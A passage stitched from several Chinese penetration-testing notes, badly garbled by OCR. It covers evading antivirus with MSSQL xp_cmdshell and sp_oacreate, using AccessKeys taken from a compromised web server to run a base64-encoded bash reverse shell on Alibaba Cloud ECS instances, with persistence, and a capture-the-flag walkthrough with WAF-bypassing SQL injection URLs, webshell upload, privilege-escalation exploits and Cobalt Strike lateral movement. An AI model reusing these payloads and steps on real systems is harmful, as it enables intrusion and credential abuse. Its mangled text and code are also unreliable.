我 免 杀 的 木马 落地 目录 ， 只 能 用 powershell 获 取 目 录 、 当 前 用 户 情况 ， 返 回 base64， 交 给 vbs， 请 
求 http log。 得 到 服务 器 环境 ， 最 终 确定 落地 目录 后 ， 基 本 上 就 可 以 getshell、 上 线 等 操作 。 
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tato» s v peira а= 
E e —— cii — ае e. 55 - ке ини 
-r (sa (64))* a v 


EXEC master..xp cmdshell "whoami" 








|» 





аже | 


WAR 15121, RIJ 16, JAR 21, ТЕ xp cmdshell, 88 1 ÍT 
在 执行 xp cmdshell 的 过 程 中 出 。 调 用 'CresteProcess' ЭУ, 错误 代码 : "Blo 


| 由 于 反 病 毒 软件 会 监控 xp_cmdshell， 一 执行 就 会 返回 CreateProcess Error Code 5 等 问 
С ЁЙ, sp oacreate 是 能 够 解决 ， 但 是 没有 回 显 ， 可 通过 发 送 网 络 请 求 来 看 。 


sp_oacreate 是 基于 ole 对 象 的 ，ole 对 象 执行 拦截 的 较 少 、 包 括 regsvr32 也 是 调用 的 ole 对 象 去 执行 
Vvbs 代 码 ， 这 其 中 有 一 种 白 名 单 派 生 关系 。 


语法 
sp_0ACreate progid, | clsid, 


objecttoken OUTPUT 
[ context | 


declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp oametFk 


4 > 


”其 中 'uscript.shell' 就 是 一 个 对 象 ， 这 个 对 象 可 以 是 其 他 ole 对 象 ， 具 体 还 需要 继续 发 气 。。 
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阿里 云 Access Token 问 题 - 项 目 收获 记录 
0x00 阿里 云 Access Token 问 题 - 项 目 收获 记录 - 前 言 


Q: 在 获得 权限 较 低 的 Webshell 的 情况 下 ， 如 何 继续 扩大 收获 ? 


A: 首先 ， 信 息 搜集 ， 分 别 包含 : 当前 权限 ， 主 机 网 络 环境 、 系 统 进 程 、 网 络 连接 状况 、 散 落 的 凭 
证 等 ， 然 后 进行 战略 分 析 


是 否 需要 提 权 
如 何 将 流量 带 入 (转发) 
结合 搜集 的 信息 转化 出 其 他 更 好 的 思路 


很 巧 ， 我 遇 到 了 第 三 种 情况 。 
Tips: 内 网 渗透 一 般 提 权 是 最 不 可 取 的 方案 ， 我 们 只 需要 不 断 搜 集 信息 、 撕 开 一 个 流量 口子 即 可 。 


0x01 阿里 云 对 象 存 储 - OSS 


什么 是 对 象 存储 ? 


阿里 云 对 象 存储 服务 (Object Storage Service， 简 称 OSS) ， 是 阿里 云 对 外 提供 的 海量 、 安 全 、 低 
成 本 、 高 可 靠 的 云 存储 服务 。 您 可 以 通过 本 文档 提供 的 简单 的 REST 接 口 ， 在 任何 时 间 、 任 何 地 
点 、 任 何 互联 网 设备 上 进行 上 传 和 下 载 数 据 。 基 于 OSS， 您 可 以 搭建 出 各 种 多 媒体 分 享 网 站 、 网 
盘 、 个 人 和 企业 数据 备份 等 基于 大 规模 数据 的 服务 。 


通过 Webshell 在 目标 机 器 (Linux) 的 Web 站 点 目录 下 发 现 多 个 子 站 配置 文件 config.php ， 配 置 
了 同一 个 阿里 云 的 OSS 地 址 ， 只 是 存储 空间 (Bucket) 不 同 。 


通常 情况 下 一 个 阿里 云 0ss 地 址 的 组 成 如 下 : 


COD 


http(s)://[BucketName].oss-cn-[Region].aliyuncs.com 
BucketName : 存储 空间 


Region: 地 域 ， 目 前 有 如 下 几 个 : 
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* Regionld 


MAS 


不 填写 

ERT (PUN) 
华北 1 (青岛 ) 
сэ Go 
华北 3 (张家口 ) 
华北 5 (呼和浩特 ) 
华东 2 CE 
华南 1 (深圳 |) 


BRD: 杭州 = cn-hangzhou 


"OQx02 Access Token 


Access Token = AccessKeyld + AccessKeySecret 
”OSS 通 过 使 用 AccessKeyld/ AccessKeySecret 对 称 加 密 的 方法 来 验证 某 个 请 求 的 发 送 者 身份 。 


AccessKeyld 用 于 标示 用 户 ，AccessKeySecret 是 用 户 用 于 加 密 签名 字符 串 和 OSS 用 来 验证 签名 字 
符 串 的 密 钥 ， 其 中 AccessKeySecret 必 须 保密 ， 只 有 用 户 和 OSS 知 道 。AccessKey 根据 所 属 账号 的 
”类 型 有 所 区 分 。 
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阿里 云 账户 AccessKey: MEZMGIIOUSACcossKey EN MMMM НЕЕ 


RAMIKF AccessKey: ВАМА АЕ ZI SS dest p. 所 拥有 的 AccessKey 拥 有 对 特定 资源 限定 
的 操作 权限 


STS 临 时 访问 凭证 ;: 由 阿里 云 账号 或 RAM 账 号 生成 ， 所 拥有 的 AccessKey 在 限定 时 间 内 拥有 对 特定 
资源 限定 的 操作 权限 。 过 期 权限 收回 。 


0x03 通过 Access Token 接 管 ECS 


ECS: 云 服 务 器 (Elastic Compute Service， 简 称 ECS) 是 一 种 简单 高 效 、 处 理 能 力 可 弹性 伸缩 的 
计算 服务 ， 帮 助 您 快速 构建 更 稳定 、 安 全 的 应 用 ， 提 升 运 维 效率 ， 降 低 IT 成 本 ， 使 您 更 专注 于 核心 
业务 创新 。 


前 面 介 绍 到 ， 默 认 情 况 下 ， 阿 里 云 用 户 获得 的 Access Token 是 对 当前 用 户 所 有 服务 通用 的 令 牌 ， 在 
没有 使 用 RAM 账 户 的 情况 下 ， 就 可 以 使 用 SDK 去 操作 阿里 云 所 有 产品 。 


在 此 次 项 目 里 ， 我 接管 了 四 台 ECS， 执 行 任意 命令 ， 获 得 最 大 权限 。 
首先 ， 通 过 读 取 配 置 文件 ， 获 得 了 同 于 上 传 图 片 所 需要 认证 的 Access Token， 如 何 检验 是 否 可 用 的 
We? 


ACCESS Key: Tdi ERR уу 
Ассе55 Secret ` кк) Ж Ж ХКК ck ck Ck ck ko ko ko К К Ж kk ok ЖОЖ 


Region о cp- "tix 
下 面 直接 调用 获取 ECS 实 例 的 API 即 可 ， 以 往 情 况 下 ， 我 会 使 用 Python， 安 装 阿里 云 的 sdk-core 
库 ， 但 是 现在 能 在 线 调 试 ， 大 大 的 节省 了 本 地 调试 的 成 本 : 


Describelnstances - 获得 实例 信息 
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Describelnstances 
接口 说 明 


请 求 参数 


名 称 类 型 Beg 示例 值 描述 


НТТР Р 相关 文档 相关 产品 


只 有 第 一 个 RegionId 是 必 填 项 ， 点 击 АРІ Explorer ， 可 以 直接 进入 调试 环境 : 





服务 器 上 的 oss 配 置 中 刚好 有 Regionld， 我 就 直接 选择 了 ， 然 后 填 入 Access Token 信 息 ， 就 可 以 获 
得 数据 。 


我 是 直接 在 Alicloud shell 里 复制 了 一 份 运行 的 : 
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shell@Alicloud:~$ cat aliyun.py 
aliyunsdkcore.client import AcsClient 
aliyunsdkcore.acs exception.exceptions import ClientException 
aliyunsdkcore.acs exception.exceptions import ServerException 


= AcsClient ( 


"ucl 


) 

# 创建 request， 并 设置 参数 

request = DescribeInstancesRequest.DescribeInstancesRequest () 
request.set PageSize (10) 

# 发 起 API 请 求 并 显示 返回 值 

response = client.do action with exception (request) 

print (response.decode() ) 


输出 结果 如 下 : 





DpenAPI Explorer AY DEAN а хей 控制 台 x Lad MEUS 


1*2018-12- Address" :(" 
Address": { u$" : "Running", "Recycla 
le": false, "Cluster , "GPUSpec" : "" , "GPUAmount? ;6, " .estanceChargeType" ; "PrePaid","D 
icatedHostAttribnta":("ledicatediosr Td" "" ,"DedicatedHostName" : "") , "DeploymentSetId" 
"},("1таде14":* = se M x Aw","Vlanld*""" “Кс нілі 
Iddreas";"","Allocationld":"", hd әб ы ҒЫТ Ажы, erat “Loop 
Imized":true,"SerialNumber"; t^: "з “het Gu“ Cpu" 4, "Memor: 
2,"DeviceAvailable";true, SecurityGroupIde":("SecurityGroupId":; бча =. ча 4 
x1"]],"SaleCycla":*"", "AutoReleaseTime";"", "OSType^ : " Li nux", "Resouroddruučan” "w 
"i"CentOS 6.5 64f[","InstanceMetworkType" :" classic", "HostName 
е x, "CreationTíme";"2016-12-13701:352", "EcsCapacityBeservatiàünhtkr^,"CapacityReser 
It fonPreference" :"", "CapacityReservationId":""|,"RegiíonId";*** Фен *, *DelerienPro 
ction”: false, "OperationLocka":["LenkWas son": [1], ExpiredTime": wae = ,"i 
елен A Toe ^ ie PS aE"), "InstanceTypePanil, ni ,"Instancet 
iw Ius М. ded oar d 47, "InternetMaxBandwidthIn":-1,"CreditSpecification":"","Inte 使 用 Python SDK 
letChargefype" ."PayByTraffic","SpotStrategy":"NoSpot", "StoppedMode": "Not -applicable", 
nternetMaxBandwidthOut":100,"VpcAttributes"*; ("Nat ipaddress" : "", "PrivatelpAddress": in 
M ddrass" : (1), "VSvitchId":"", "VecId";""), "SpotPricelimit":0,0, "StartTime": VE f, , 
aul," InstanceName" : "Ii MRS 8 1". "Description": "", "PublicipAddresa": (" IpAdaress":]" 
Yi ),"InstanceType": *"We.* erę" , "Status": "Running", "Recyclable":false," 
*, "GPUSpec" : "", "GPUAmounr." гй, * Li&canceChargeType" : "PrePaid", "DedicatedHost 
tribute": "Ре om, diis qud" ^, "Deadi^atedHostName": =}, "DeploymentSetId*;"*]), ("Image 
"w dae Lal, 1. ASS ыглай 2. ЖЫТ. raw", "VianId"; "" "EL Абл ass": ("IpAddress";"" 
AllocationId";""."InternetC$ha"ze ese: ` ТЫСТЫ 
"SerialNumber?":*" wr 59 mint cw ЕКІ ШУЫ АРТЫҒЫ В, “Devic 
álable" стра. "SecurityGroupIds": ("SecurityGroupId": 
Dt dAlbow)),"SaleCycle":"","AutoReleaseTime" 
aero =, "SN" CentOS 6.5 64 0", "IinstanceNetworkType" : "classic", "HostName": 
"MAC A жа ж" "CreationTime" ;"2016-12-13703:352^, "EcsCapacityReservationAtt." 
vous v yReservationPreference":"", "CapacityReservationId":""), "RegionId"i өзү, ж 
*DeletionProtection":false, "OperationLocka"; "LockReason" : 1) ) , "ExpiredTime*:^19 5212 
3116:002","InnerIpAdd»swe"a "os gy numo: FE" 24, dU eH E) n InstanceTypeFamily";"ecs. 
","lnstanceId";*" 42 Bq. AY ми а a> ,"internetmaxsandwidthIn":-L, "CreditSpecifica 
Юп" 19", "nternettnargeType" : "PayByTraf fic", "SpotStrategy": "NoSpot", "StoppedMode” 
applicable", "InternetMaxBandwidthOut":100, "VpcAttributes’ *NatIpAddress":"^,"Privat 
jpAddresa" : ("*IpAddress" «(1], "VswitchId":"", VpcId":*"), "SpotPriceLimit":0.0, artTim 
1"2018-10-23712:142", "TnstanceNane" “ИШАН: "Doe cription* wn, "PublicIpAddress":( 
Mog "11, "InstanceType" ; "ecs nl. Large", "Statua": "Running", "Recyc 
ble":false,"Cfusrer' "GPUAmount" :0, "InatanceChargeType" :"PrePaid", 
i "DedicatedHostId";"","DedicatedHostName": ""|, "DeploymentSect 





使 用 json.cn 格式 化 一 下 : 
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"TotalCount":., 


"PageSize": ^, 


"RequestId": . А uw ihe l Е" ТАТА 
"Instances" :O{ 
"Instance" :©[ 
Е 
"ImageId": i 05а DM 
"VlanId": ', 
"EipAddress":C 


"IpAddress": ^, 
"AllocationId": ', 
“InternetChargeType": 
}, 
"ZoneId". b". 
"IoO0ptimized":: ү 
"SerialNumber" 
СрО, 
"Memory": i 
“DeviceAvailable": true, 
"SecurityGrouplds" :Ot 
"SecuritvGrouoId" :BI 


] 
Ls 
"SaleCycle": ^, 
"AutoReleaseTime": ', 
"OSType":" linux", 
"ResourceGroupId": 
"OSName":"CentOS 7.3 6417", 
"InstanceNetworkTyoe": classic’, 
"HostName' ^ === 
"CreationTime":"2018-11-04T05:502", 
Есесін ені: e 
"CapacityReservationPreference": ', 
"CapacityReservationId": 
P 
"RegionId"** W p" r= wan, 
"DeletionProtection": false, 
“OperationLocks" : Of 


台 服 务 器 ， 那 么 如 何 执行 命令 呢 ? 
先 要 创建 一 条 命令 ， 然 后 指定 实例 来 调用 命令 ， 手 册 地 址 : 


detail/64844 html 





* RunBatScript: 创建 一 个 在 Windows 实例 中 运行 的 Bat 脚本 
* RunPowerShellScript: 创建 一 个 在 Windows 实例 中 运行 的 PowerShell 脚本 
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“ RunShellScript: 创建 一 个 在 Linux 实例 中 运行 的 Shell 脚本 > 


由 于 都 是 Linux， 我 就 选择 RunShellScript， 注 意 ; 命令 必须 是 base64encode 


rvn0xsy@Rvn0xsy ~> echo "bash -i >& /dev/tcp/1.1.1.1/2333 0>&1" | base64 
YmFzaCAtaSA*JiAvZGV2L3RjcC8xLjEuMSAxLzIzMzMgMDAmMQo- 


ZARA BB CreateCommand 


Command 


Describe 5 
Modily 


Invoke a aliyunsdkcore, client pori Acsclient 
aliyunsdkcore.acs exception.exceptions import ClientException 
RunSholiSorir aliyunsdkcore.acs exception,exceptions mnor: ServerException 
м aliyunsdkecs. request. v20140526.CreateCommandRequesl import CreateConmandRequest 


Delete 


nmandContent Client = AcsClient('«accensKeylds!, "«uccensSecr 3 shanghai”) 


request = CreateCommandRequest () 
request. set accept, format (' json’) 
request. set, Type" PursnellSceipt") 
request. set_CommandContent("YmfsacAtaGA JiAvZ6V2L IR) c COL) CoMSd» L2 1 M: NQMD43M0 
request, set, Мате ("езт") 
Working Dir 


response = client.do action with exception( request) 


t(str(response, encoding='u'f-ñ')) 


#!/usr/bin/env python 
#coding=utf -8 


from aliyunsdkcore.client import AcsClient 
from aliyunsdkcore.acs_exception.exceptions import ClientException 





from aliyunsdkcore.acs_exception.exceptions import ServerException 
from aliyunsdkecs.request.v20140526.CreateCommandRequest import CreateCommandRec 


client = AcsClient('«accessKeyId»', '«accessSecret»', 'cn-shanghai') 


request - CreateCommandRequest( ) 
request.set accept format('json') 


request.set Type("RunShellScript") 

request.set CommandContent("YmFzaCAtaSA*JiAvZGV2L3RjcC8xL j EuMSAxLzIzMzMgMD4mMQo- 
request.set Name("test") 

response - client.do action with exception(request) 


# python2: print(response) 
print(str(response, encoding='utf-8')) 


执行 成 功 后 ， 会 返回 如 下 信息 : 
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4 Ed А - v е ; - 


"RequestId": kuk l c ELLE ЖЕ кк а и 





"CommandId": "c-Q****xsxxsxsxn 
) 
“Commandld 最 好 记 下 来 ， 不 然 还 要 调用 Commana 


"PageNumber": 1, 
rotalGount rt 1, 
"PageSize": 10, 
"RequestId"; "***4xex* cxx x o oen, 
"Commands": ( 
"Command": [ 


t 
"Name: s "test", 
"Timeout": 3600, 
"CommandContent": "YmFzaCAtaSA*JiAVvZGV2L3RjcC8xL j EuMSAxLz IzMzMgN 
"Description": P 
"Type": "RunShellScript", 
"CommandId": "с-өз хх жын 
"WorkingDir": "" 


_* Regionid: 区 域 ID， 例 如 : cn-shanghai 

. * Commandid: 命令 ID 

. * Instanceld: 实例 ID 

* Timed: 命令 是 否 为 周期 执行 。 默认 值 : False 

* Frequency: 周期 任务 的 执行 周期 ， 两 次 周期 任务 的 时 间 间 隔 不 能 低 于 10 秒 。 当 参数 Timed 的 
值 为 True 时 ， 参 数 Frequency 为 必需 参数 。 该 参数 取 值 遵 循 Cron 表 达 式 ， 参 阅 Cron 守 这 式 。 


默认 情况 下 ， 我 们 不 需要 管 后 面 的 参数 ， 如 果 你 想 权限 维持 的 话 ， 可 以 设置 Timed 为 False， 并 且 设 
重 Frequency 为 定时 任务 计划 表达 式 ， 执 行 的 过 程 中 ， 基 本 上 不 会 拦截 ， 因 为 Access Token 的 调 
用 ， 一 切 都 是 白 名 单 的 。 
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InvokeCommand 


* Regiontd. 


* Commandid 


cmm 


* Instanceld = [ 


xxx 


Frequency 





from aliyunsdkcore.client import AcsClient 

trom aliyunsdkcore.acs exception.exceptions import ClientException 
aliyunsdkcore.acs exception.exceptions import ServerException 
aliyunsdkecs.request.v20140526.1nvokeCommandRequest import InvokeCommandRequest 








client = AcsClient('«accessKeyId»', '«accessSecret»', 'cn-shanghai') 


request = InvokeCommandRequest() 
request,set accept format(')json') 


request.set CommandId("c-Q«sas meme") 
request,set Instancelds(["xxx"]) 


response = client.do action with exception(request] 


grint(str(response, encoding='utf-8")) 
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从 打点 到 域 控 的 练习 
0x01 ЛО 


web1: 


web2: 


0x02 SQL 注入 


两 个 入 口 都 能 进 到 内 网 ，web1 主 要 是 找 exp， 环 境 是 linux+discuz6.0， 能 用 的 漏 润 很多， 但 是 我 当 
时 没 利用 成 功 ， 就 不 写 了 ， 影 响 不 大 。 


Web2 是 一 个 商城 系统 ， 加 单 引 号 报错 了 ， 说 明 可 能 存在 注入 


€ me йа аш 
к» 


1 SQ 100 neryptions Encoding Other" 


м шыт Sip /reseed pipri] U 
асан 
[7 Enable Post data [7 Enable Referrer 





http://172.16.8.8/product.php?id-12' and ''=' 


安全 狗 ， 此 地 无 银 三 百 两 ， 估 计 就 是 考 绕 狗 注 入 了 ， 难 度 不 大 ， 直 接 发 payload 了 


http://172.16.8.8/product.php?id=12'/*%!AA*/order/*%!AA*/by/*%!AA*/1 -- - 
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Home ? Product 


MSI GP62 Leopard Pro 


Price 


$ 839 
NO. ] IN GAMING 





Home ? Product 





http://172.16.8.8/product .php?id=12'/*%!AA*/order/*%! AA*/by/*%!AA*/6 -- - 
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Home > Product 





MSI GP62 Leopard Pro 


| (777224 Ргісе 





$ 839 
NO. ] IN GAMING š 
id 
字段 数 是 6 
当前 数据 库 


http://172.16.8.8/product .php?id=12'/*%!AA*/union/*%!AA*/select/*%!AA*/1, databas 


> 


Home > Product 





smartshop 


Price 
$3 


查 表 ， 将 数据 库 名 转换 成 16 进 制 : 


http://172.16.8.8/product.php?id=12'/*%!AA*/union/*%!AA*/select/*%!AA*/1,table r 


А 
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Home ? Product 





提示 中 flag 在 数据 库 里 面 ， 通 过 limit 查 其 他 的 表 : 


http://172.16.8.8/product.php?id=12'/*%!AA*/union/*%!AA*/select/*%!AA*/1,table_r 








Home ? Product 





http://172.16.8.8/product.php?id=12'/*%! AA* /union/*96! AA* / select/*9*4! AA* /1, group. с 


» 


Home ? Product 





爆 数据 : 


http://172.16.8.8/product .php?id=12'/*%!AA*/union/*%! AA* /select/*9?6! AA* /1, f lag, 3, 


HI 


> Product 





flag1{9b196fe7574e9a590a7df0710741d619} 


Price 
S3 


后 面 发 现 ， 有 phpmyadmin( 当 时 没 想到 要 扫 服 务 ， 毕 竟 VMware vSphere 性 能 有 限 ， 如 果 都 做 扫描 
的 话 ， 网 站 可 能 会 承受 不 住 )， 可 以 登录 写 shell。 


0x03 另 一 个 入 口 


扫描 端口 ， 发 现 还 有 8080 端 口 


nmap -F -sV -Pn 172.16.8.8 
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ш Lead m [http 7/172 16 8.5 8050 
а Split WL 
` Execute 
17 Enable Post date [7 Enable Referrer 


点 击 重新 登录 : 


172.16 8.6 
INT v] = © SQL XSS- Encryption» Encoding: Other- 
ы Load URL 
p Split URL 
Execute 


, 


[ Enable Post data [7 Enable Referrer 





没有 验证 码 ， 弱 口令 爆破 : 


118 admin 1q2w3e4r 302 Ü G Ы 
2 200 о L) 4386 ч 
系统 公告 
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| eG 
, E О Bee 
| DRE 
marawa 
Terms 
ЕГЕУ 
Desk 
сағ» 
BESLI 
B y eee 
4 0 Аха 


өтте 


[ Enable Post data 


<p> flag4ic485431940c2c7170564e422b0adc16f < /p» 


rm s етте ven : 
ы кына [rosse maio me МЕ ; 








` муйн® 


E яра 
ЕСІ 
š hi 
> ЯбІ 


5 UE 


5 jop 


= ум 
ЖЕ 

ақыл 
т? 





Centent-Disposition: form-data; name= с 



















































































a 

9 Ф + 

----------------------------- 2860213 

Content-Disposition: form-dat э; name- cwglkm? /selectoc/1d 

«Ут» 
a er 
----------------16603139622820 cto style= text-xligniright. background-color:$F PORC > spar 
Content-Dispozition: form-data; nimes cwplkmi3 classe tontons P^ AED: </span> /ta 
хта stylez text-alignileft 
^ <anpot type= file" памет FileUpload! ide Flletploadi in 
93139622820! type="submit” name btnful value=" (0 ide btntul 
: form-data; name= DropDownListll style= color:Wlite backer I-color:$ (0SGEF font-weight :bold 
imt 14- fmagelió 
styles height: 150px width 
28663138! 9 t /td 
Content-Disposition: form- data, палет FaleUploadi ` filename= хх. aspx /tr 
Content-Type: application octet-stream tr 
td style= text-align: right 

test “Font ene ОРО а ар 

----------------------------- 266081396222201 "ТехтБох22° type="text” id= 

Centent-Disposition: form-dota. name= btntul ide RequiredfieldValidatorll 

| styles nusibilitvshiddeno^ СФЕ) ir 
266981396. 

Content-Disposition: form-data. name td style= text-align: right color: SF FIFE par 
class= fontone OJ Ah: (pun text-align: left input 
nage= TextBox 1° types text id= һа pat 

—€— 56081 а= RequaredFieldValadat о: 

Content-Disposition: form-dats; пажес I style= bilatyshidden:” ^ (AE IVA) C/ pan 714 

tr 
== 246021396 td style= text-slagn: right par 
Content-Disposit ion: Т gn: left 
ы 
жем 
Content-Disposition: form-data, name= lextbox55 v 





< 172. 16.8.8: 8090/Inage: 


INT vl o 2 SQL: XSS- Encryption: Encoding: Other- 
кы Load URL 


% 


dy Split URL 


, Execute 


[ Enable Post data Í Enable Referrer 





上 传 shell 
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CO C: \inetpub\wwwroot\Images\ 





we А: 
E ч С: 
= LI inetpub 
= LL wweroot 
wD 


返回 上 一 级 目录 : 


[ e. 


0x05 提 权 


查看 当前 权限 : 


(0), гіз (Ба) 


AM 


_ Т.азрх 


= Lpg 


1р1 


= 11.asps:1.ipg 
= 11111.азрхЛ (ра 


12 aspx 
124 


1х aspx 


= lxaspxipg 


2 aspx 


= 2jpg 


2222 aspx 
2x. aspx 
32 aspx 
32x aspx 
3333 aspx 


ж” 3333 exe 


3х aspx 

404 php 

4x aspx 

5x aspx 
63667963441000000 
63667963441000000 
Bx. aspx 

78 азр 


C: Line tpub\wwwr оо 1445946 асТТТ 49122567935 2#с62 F406. txt 
flag6 (84 a02¢397434d30b5191 22570040676} 


2018-08-11 15:41:03 
2018-08-14 15:40:26 
2018-08-11 145%52 
2018-08-11 16:47:45 
2018-08-11 17:03:48 
2018-08-11 15:31:06 
2018-08-11 15:30:10 
2018-08-11 13:48:45 
2018-08-11 13:42:42 
2018-08-11 15:43:48 
2018-08-11 15:43:06 
2018-08-11 18:08:56 
2018-08-11 15:09:37 
2018-08-11 12:54:21 
2018-08-11 12:55:19 
2018-08-11 1818:38 
2018-09-11 2223.23 
2018-08-11 15:1913 
2018-08-11 12:49 42 
2018-08-11 15:37:58 
2018-0611 15:38:27 
2018-08-11 22:44:52 
2018-08-11 22 48:28 
2019-08-11 15:38:32 
2018-08-11 17:07:39 
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" 8% 








Sig 20194 


= 0 站 点 类 别 
默认 类 别 

Туре! 

- 日程 提 醒 
快捷 方式 





提示 说 在 桌面 可 能 还 有 flag, 但 是 当前 权限 无 法 访问 桌面 ， 所 有 需要 提 权 


使 用 ms16-032 进 行 提 权 : 





EZANI 
Cobak Strike View Attacks Reporting Help 


ugmomgzonmsi»ucS.ehBooo.NNlo 





查找 桌面 的 flag: 


1979 





驱动 器 c 中 的 卷 没 有 标签 。 
卷 的 序列 号 是 3AC8-D2E9 





c:\users\administrator\desktop 的 目录 


14:52 <DIR> 
14:5 <DIR> m 
11:2 39 cd4ef7fbdl2elbbd4f8453f55b44007461. txt 
2018/08/11 14: 1, 196,865 DataExplore xp500. сов. гаг 
2018/08/11 14: <DIR> DataExploreS {EER AYV2. 53 破 解 版 
2018/08/02 10: 29,735,592 safedogwzApache. exe 
2018/08/02 10: 589 WampServer. Ink 
2018/08/02 10:53 1,237 网 站 安全 狗 (Apache 版 ). Ink 
5 个 文件 33,934,322 字 节 
3 个 目录 37,529, 448, 448 可 用 字 节 


beacon> shell type c:\users\administrator \desktop\cdef7fbdi2e1lbb4f£8453f55b44007461. txt 


[+*+] Tasked beacon to run: type c:\users\administrator\desktop\c4ef7fbd12elbb4f8453f55b44007461. txt 


[+] host called home, sent: 80 bytes 
[+] received output 


flag3{200ceb26807d6bf99fd6f 4f0dica54d4} 


0x06 进入 内 网 


对 内 网 进行 探测 ， 发 现存 在 另 一 个 网 段 : 192.168.10.0/24 


使 用 regeorg 代 理 ， 扫 描 后 发 现存 在 ms17010 漏 洞 (其 实 这 个 不 是 考点 ， 出 题 人 打 了 补丁 忘记 重启 
了 ， 嘿 嘿 ， 如 果 不 用 ms17010 就 要 转发 访问 内 网 服务 器 的 web 进 行 渗透 ) 


python regeorg.py -u 


[m 
ең ^ 
42% 2 
©. - e LJ- 0.9) 

| 运行 €um 代理 。 登录 RE "X 帮助 ms Bt 
| бйз КЕРУ I] site. Га 2506: 012 s 了 
| | 国 Tis4or :nS17-010 ЖИЙ Agi x! | 
| — : Gl 
| [ 

| 
| | 
| | 
ee | 
| нші 
| | 
| | 
| | 
| | 

| 
| | 

" 

DT 12 








| вия. SERT а аа» 


使 用 exp 反 弹 shell 回 来 
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OutConf: | vakdateOniy Protocot: | v] Architecture: a “ш 
outst —] 
OutputFle: [C Users Aaminn ator Desktop tools festoi orexe — = 








RunShelcode 





SheicodeFie: | 


创建 用 户 ， 通 过 cobaltstrike 进 行 连接 : 


whoanmi 


root root 210 Н [e $ Et мар administr ati 


net loca 

















Event Log X | Beacon 192.168.109.10023716 X | hs эр 
B2 r 

Fiver 

= 

= 

ШЕ 192.168.100.15 

№ 192.168.100.100 WEB2-0 

ШЕ 192.1684 4 
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Event Log encon $3716 X Targets X | Beacon 192.168.10 


1:500 
]:1500 


rev2selM 
ked beacon to revert tok 
make token .|root rootl 
beacon to create а t 
c.psb PCI $333 
d beacon to windows /u a sab/hind pipe (XXP on PCL vi 
lled home, sent. 212686 bytes 
usted ИТ AUTHORITY TEN 
ved output 
ed service 9812043 on PCI 
tablished Link to child beacon? 192, 168. 10. 10 
leep ba 1froa: Beacon 197.168. 10. 1083036] 


кей beacon t 





Éventlog X | Beacon 192.168.100,10063716 X | Targets X 
O., 7948899 
NewCredenti 
YS TEN 
NU AUTHORITY 
(ont) 
в/11 22 


ЖЕ 


0003] Primary 


admin 
кі 


HEU MED 


adma 


sked beacon to run: dir c:\users\admin\desk top 
[+] host called home, sent: 34 bytes 
[+] received output: 
Babes c 中 的 卷 没有 标签 。 
GUESS sce7-EF20 


c:\users\admin\desktop Е 


2018/08/02 11:24 <DIR>? 
2018/08/02 11:24 <DIR> att 
2018/08/02. 11:24 39 flag. txt 
i xit 39 字 节 
2 个 目录 39;377, 330,176 可 用 字 节 


> shell type ci\hsers\adnin\desktop\flag. txt 








a Service Control Wanager (PSH) 





[+] Tasked beacon to run: type с: \users\admin\desktop\flag. txt 


[+] host called Home; sent. 44 bytes 
[*] received Output: | tš 


f1ag9 [b5Sffed57825d7ff193604bf d8246c6b] 
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还 有 另 一 台 PC2 


PC1 与 PC2 存 在 通用 账户 admin 


使 用 通用 密码 进行 登录 : 


beacon? sleep 1 
|^] Tasked beacon to 


3388 476 
3620 3220 
3652 316 
3100 3160 
4052 176 


explorer. exe 


svchost. ere 


beacon) inject 3160 


sienp for ts 


NT AUTHORITY\NETWORK SERVICE 
NT AUTHORITY\SYSTEM 
ЖТ AUTHORITY\SYSTEM 
ACLAB\test2 


NI AUTHORITY \LOCAL 


SERVICE 


{+1 Tasked beacon to inject windows/beacon http/reverse http (172.20.200.150:2222) into 3160 (286) 


Í+] host called howe, sent 


544 bytes 


ceuld not open process 3160: 87 


beacon? shell type c:\users\admin\desktop\flag. txt 


141 Tasked beacon to run 
197 host called home, sent 
[+] received ontput 


系统 找 不 到 指定 的 文件 、 


type с 


\nsers\admin\desktop\f lag. txt 


11 bytes 


beacon shell type c:\users\test2\desktop\flag. txt 


{+1 Tasked beacon to run 
{+1 hast called bose, sent 
{+} received output 
#12810 [978e11004264d2453 
[PC2] SYSTEM */3620 


type < 


\users\test2\desktop\flag. trt 


44 bytes 


bebf77cc82d] 


*] Tasked beacon to list processes 


[+] host called home, 


[+] Process List 


PID PPID Наме 


sent: 


12 bytes 


[System Process] 


Systen 


SRBSS. exe 


csrss. 


exe 


splunk-perfmon. exe 


wininit.exe 


csrss. 


exe 


winlogon. exe 


Services. exe 


lsass. 


exe 


ism. exe 


l.exe 


svchost.exe 


svchost. exe 


Session 


О e = oOo O O = = © ° © о 


AUTHORITYNASYSTEN 
AUTHORITY\SYSTEM 
AUTHORITY\SYSTER 
AUTHBORITY\SYSTEN 
AUTHORITY\SYSTER 
AUTBORITYASYSTEN 
AUTHORITYNSYSTEN 
AUTHORITYNSYSTEXR 
AUTHORITY\SYSTER 

ACLAB\test2 

NT AUTHORITY\SYSTER 


НІ AUTHORITY\WETWORK SERVICE 












56oms 





100.10043716 X Targets X Beacon 192.168.10.10%2036 X | Listeners X — Beacon 192 






Credentials x | Beacon 192.168 10.2093620 X 
ACLAB\ test? 
plunk winevtlog. exe НТ AUTHORITY\SYSTER 
powershell. exe МІ AUTHORITY SYSTEM 
LI io Ni AUTHORITY WETWOKK SERVICE 
dlibost. exe AUTHORITY 
power shell, еке T AUTHORITY 
Sexrchludexer. exe ue NT AGTHORTTYA 
host. exe ка AB\ test? 
AUTHORITY 
AUTHORTTY 
CLAB\ test? 
AUTHORITY 
NT AUTHORITY WETWORK SERVICE 
WT AUTHORITY 
NT AUTHORITY 
explorer. exe ACLAB\ tent? 
svchost, exe WT AGTHORITY\L 


inject 3100 
кей beacon to inject window en bttp/revsrse bttp (172. 20. 200. 150 2222} into 3100 (a86) 


called Бове, sent: 541 byte 


Cobalt Strike View Attacks Reporting Help 
пвп а= 60 at PO Gehl Pa ва 


a 








Beacon 192.168.1 10.108232 Credentials X | Beacon 192.168.10.20@36;0 x | Beacon 19. 





00.1003: Targets X | Beacon 192.168.10.10@ X | Usteners x | Beacon 192.168 








«op to sleep for 1% 
1 who 
o rum. whomsi 
on te run. who»wi 
dh sent. H byte 
1 output 


Maga, MAAIE 


ifconfig /all 发 现 dns 是 192.168.100.10， 推 测 是 域 控 。 


查询 GPP 密 码 ， 发 现 不 存在 历史 密码 。 


使 用 ms14068 进 行 攻 击 ， 上 传 ms14068.exe 


ms14-068.exe -u test2@aclab.com -s S-1-5-21-4073582663-3176860511-3241980539-116 


